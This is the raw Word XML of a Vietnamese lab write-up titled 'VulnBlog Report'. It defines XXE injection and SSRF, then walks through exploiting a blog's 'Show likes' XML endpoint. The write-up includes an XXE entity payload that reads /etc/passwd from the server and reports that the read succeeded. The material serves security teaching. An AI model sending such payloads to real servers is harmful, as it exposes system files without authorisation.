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61B56" w14:textId="77777777" w:rsidR="005018CB" w:rsidRPr="005A18BC" w:rsidRDefault="005018CB" w:rsidP="005018CB">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A18BC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>VULNBLOG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3413A63B" w14:textId="77777777" w:rsidR="005018CB" w:rsidRPr="005A18BC" w:rsidRDefault="005018CB" w:rsidP="005018CB">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A18BC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>REPORT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10117A5E" w14:textId="4648ACF0" w:rsidR="00A07031" w:rsidRPr="005A18BC" w:rsidRDefault="00A07031" w:rsidP="005018CB">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6256F42F" w14:textId="77777777" w:rsidR="005018CB" w:rsidRPr="005A18BC" w:rsidRDefault="005018CB" w:rsidP="005018CB">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59FBC70F" w14:textId="77777777" w:rsidR="005018CB" w:rsidRPr="005A18BC" w:rsidRDefault="005018CB" w:rsidP="005018CB">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EC77DD9" w14:textId="77777777" w:rsidR="005018CB" w:rsidRPr="005A18BC" w:rsidRDefault="005018CB" w:rsidP="005018CB">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BDBDF04" w14:textId="77777777" w:rsidR="005018CB" w:rsidRPr="005A18BC" w:rsidRDefault="005018CB" w:rsidP="005018CB">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="657C8885" w14:textId="77777777" w:rsidR="005018CB" w:rsidRPr="005A18BC" w:rsidRDefault="005018CB" w:rsidP="005018CB">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BF06912" w14:textId="77777777" w:rsidR="005018CB" w:rsidRPr="005A18BC" w:rsidRDefault="005018CB" w:rsidP="005018CB">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:sectPr w:rsidR="005018CB" w:rsidRPr="005A18BC" w:rsidSect="005018CB">
          <w:pgSz w:w="12240" w:h="15840" w:code="1"/>
          <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:vAlign w:val="center"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1166F75F" w14:textId="617DB273" w:rsidR="005018CB" w:rsidRPr="005A18BC" w:rsidRDefault="00194C47" w:rsidP="00BD1E3F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A18BC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidR="00BD1E3F" w:rsidRPr="005A18BC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BD1E3F" w:rsidRPr="005A18BC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>XML external entity</w:t>
      </w:r>
      <w:r w:rsidR="004D0809" w:rsidRPr="005A18BC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BD1E3F" w:rsidRPr="005A18BC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00266076" w:rsidRPr="005A18BC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>XXE</w:t>
      </w:r>
      <w:r w:rsidR="00BD1E3F" w:rsidRPr="005A18BC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="004D0809" w:rsidRPr="005A18BC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DAE68DA" w14:textId="46F93548" w:rsidR="00570B27" w:rsidRPr="005A18BC" w:rsidRDefault="004D0809" w:rsidP="005018CB">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A18BC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Khi một trang web sử dụng ngôn ngữ XML xử lý dữ liệu mà kẻ tấn công có thể can thiệp vào quá trình này sẽ dẫn tới lỗ hổng XXE injection. Lỗ hổng thường cho phép kẻ tấn công có thể truy xuất nội dung các tệp nhạy cảm trong hệ thống, trở thành cơ sở cho các phương thức tấn công khác.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F78E9A" w14:textId="77777777" w:rsidR="00570B27" w:rsidRPr="005A18BC" w:rsidRDefault="00570B27" w:rsidP="005018CB">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="195ED995" w14:textId="77777777" w:rsidR="009F5B2F" w:rsidRPr="005A18BC" w:rsidRDefault="009F5B2F" w:rsidP="009F5B2F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A18BC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A18BC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Server side request forgery vulnerabilities (SSRF) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63619863" w14:textId="679A9FEA" w:rsidR="009F5B2F" w:rsidRPr="005A18BC" w:rsidRDefault="009F5B2F" w:rsidP="005018CB">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A18BC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Server-side request forgery (thường được gọi là SSRF) là một dạng tấn công trong đó kẻ tấn công lợi dụng một tính năng của server public nhằm truy xuất trái phép dữ liệu từ một trang web chỉ định khác, thường là các trang web back-end ở chính server đó.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00135C76" w14:textId="77777777" w:rsidR="005A18BC" w:rsidRPr="005A18BC" w:rsidRDefault="005A18BC" w:rsidP="005018CB">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7758A5EC" w14:textId="608FDC72" w:rsidR="005A18BC" w:rsidRPr="005A18BC" w:rsidRDefault="005A18BC" w:rsidP="005018CB">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A18BC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3. VulnBlog Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108BC1B2" w14:textId="77777777" w:rsidR="005A18BC" w:rsidRPr="005A18BC" w:rsidRDefault="005A18BC" w:rsidP="005A18BC">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A18BC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Exploiting XXE using external entities to retrieve files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE6FA23" w14:textId="5990827E"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Truy cập một bài viết bất kỳ, ta thấy bài viết có một chức năng cho phép xem số lượt like thông qua nút “Show likes”:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1345518C" w14:textId="1A1FCFF5" w:rsidR="00D20594" w:rsidRPr="005A18BC" w:rsidRDefault="00D20594" w:rsidP="005018CB">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A18BC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5179B2FC" wp14:editId="762BD004">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4685"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE31973" w14:textId="0E9E42A0" w:rsidR="005A18BC" w:rsidRDefault="005A18BC" w:rsidP="005A18BC">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A18BC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Chức năng </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>xem lượt likes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786E2D1F" w14:textId="77777777" w:rsidR="005A18BC" w:rsidRDefault="005A18BC" w:rsidP="005A18BC">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08414716" w14:textId="77777777" w:rsidR="005A18BC" w:rsidRDefault="005A18BC" w:rsidP="005A18BC">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7657450C" w14:textId="4D9B6998" w:rsidR="005A18BC" w:rsidRPr="005A18BC" w:rsidRDefault="005A18BC" w:rsidP="005A18BC">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Thực hiện nhấn nút “Show likes” để kiểm tra chức năng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D1C5A9" w14:textId="6EE58D9B" w:rsidR="00D20594" w:rsidRDefault="00D20594" w:rsidP="005018CB">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A18BC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77767083" wp14:editId="32D364FB">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0875"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="45CF83D5" w14:textId="19405211" w:rsidR="005A18BC" w:rsidRDefault="005A18BC" w:rsidP="005A18BC">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Chức năng xem lượt likes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E29180" w14:textId="77777777" w:rsidR="005A18BC" w:rsidRDefault="005A18BC" w:rsidP="005A18BC">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E68189A" w14:textId="2FBB6B54"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Kết quả cho chúng ta thấy bài viết có 42 lượt likes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63ABAF6E" w14:textId="6808E52D" w:rsidR="005A18BC" w:rsidRPr="005A18BC" w:rsidRDefault="005A18BC" w:rsidP="005A18BC">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A18BC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Tiếp theo, ta sẽ quan sát request của chức năng này với Burp Suite:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D09A89F" w14:textId="179B37BE" w:rsidR="009D71DA" w:rsidRDefault="009D71DA" w:rsidP="005018CB">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A18BC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38B63609" wp14:editId="6CD243C8">
            <wp:extent cx="5943600" cy="3230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30245"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1C50B5" w14:textId="280B9DB4" w:rsidR="005A18BC" w:rsidRPr="00C975A7" w:rsidRDefault="005A18BC" w:rsidP="005018CB">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C975A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Chức năng gửi một POST request tới file xml.php với data dạng XML, sau đó trang xml.php</w:t>
      </w:r>
      <w:r w:rsidR="00891348" w:rsidRPr="00C975A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> đọc thông tin của postId và</w:t>
      </w:r>
      <w:r w:rsidRPr="00C975A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> trả về kết quả là 42.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152C622B" w14:textId="128A3EAA" w:rsidR="005A18BC" w:rsidRPr="00C975A7" w:rsidRDefault="005A18BC" w:rsidP="005018CB">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C975A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ta sẽ thực hiện XXE injection để đọc thử file /etc/passwd trên máy chủ:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01ED423E" w14:textId="4FAC1BEE" w:rsidR="005A18BC" w:rsidRPr="00C975A7" w:rsidRDefault="005A18BC" w:rsidP="005A18BC">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C975A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;!DOCTYPE </w:t>
      </w:r>
      <w:r w:rsidRPr="00C975A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>test</w:t>
      </w:r>
      <w:r w:rsidRPr="00C975A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> [ &lt;!ENTITY xxe SYSTEM "file:///</w:t>
      </w:r>
      <w:r w:rsidRPr="00C975A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:r w:rsidRPr="00C975A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00C975A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">passwd </w:t>
      </w:r>
      <w:r w:rsidRPr="00C975A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"&gt; ]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7560001D" w14:textId="623998B9" w:rsidR="005A18BC" w:rsidRPr="00C975A7" w:rsidRDefault="00891348" w:rsidP="005A18BC">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C975A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Thay đổi postId thành &amp;xxe; để xem nội dung của file /etc/passwd:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38368A85" w14:textId="1A113F3B" w:rsidR="00266076" w:rsidRDefault="00266076" w:rsidP="005018CB">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A18BC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22B38224" wp14:editId="2D4CEE8D">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0720"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDA8ADB" w14:textId="55A7E507" w:rsidR="00891348" w:rsidRPr="00C975A7" w:rsidRDefault="00891348" w:rsidP="00891348">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C975A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Thực hiện XXE injection để đọc file /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3507BEE5" w14:textId="77777777" w:rsidR="00891348" w:rsidRPr="00C975A7" w:rsidRDefault="00891348" w:rsidP="00891348">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14497B7C" w14:textId="04F3C76D" w:rsidR="00891348" w:rsidRPr="00C975A7" w:rsidRDefault="00891348" w:rsidP="00891348">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C975A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Kết quả là chức năng tồn tại lỗ hổng XXE injection, và ta thành công đọc được file /etc/passwd.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B696163" w14:textId="77777777" w:rsidR="00891348" w:rsidRPr="00C975A7" w:rsidRDefault="00891348" w:rsidP="00891348">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
